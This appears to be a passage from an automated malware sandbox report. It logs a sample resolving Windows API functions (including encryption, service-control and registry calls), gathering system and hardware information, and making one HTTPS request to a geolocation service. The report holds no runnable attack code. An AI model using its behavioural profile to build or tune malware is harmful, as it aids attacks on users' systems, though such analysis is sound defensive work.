Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x7536110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75363587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x753658a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77603002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x7536495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x753834d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x7537f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x75363bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75361328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x753614c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x775fe026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x753651b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75363531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75387aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x753e4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x753614e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75361450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x753617ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75365189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x7538d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75364493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x753654ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x7536dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x7536179c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x75488a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x75491341 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x75489a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x754878e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x75489abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x754888f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x75491361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x75487809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x7548b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x75490dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x75487136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x75489679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x75493559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x776025dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x754dfd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x754905ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x754dfd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x7548787b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x76f6369c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76f6157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x76f5df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76f614d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76f6469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x76f77144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x76f5ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x76f5df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76f7779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76f5c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76f646ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76077078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x75beb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x75c186d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75c19d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x76b53eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x76b53ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x76b55dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x76b54af8 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x76b53e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x76b53f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x76b54642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x76b5fd6b True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x750f9263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x76b1311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x76b27673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x76b1b131 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x7502436b True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x7503572c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x74e9c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x753e410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
System (274)
Operation Additional Information Success Count Logfile
Sleep duration = 1 milliseconds (0.001 seconds) True 19
Fn
Get Time type = System Time, time = 2019-03-24 05:39:10 (UTC) True 1
Fn
Get Time type = Ticks, time = 106533 True 1
Fn
Get Time type = Performance Ctr, time = 15370031874 True 1
Fn
Get Time type = System Time, time = 2019-03-24 05:39:12 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 15773662834 True 1
Fn
Get Info type = Hardware Information True 249
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (1)
Information Value
Total Data Sent 467 bytes
Total Data Received 7.32 KB
Contacted Host Count 1
Contacted Hosts 77.123.139.189
HTTP Session #1
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.32 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 554 True 1
Fn
Data
Close Session - True 1
Fn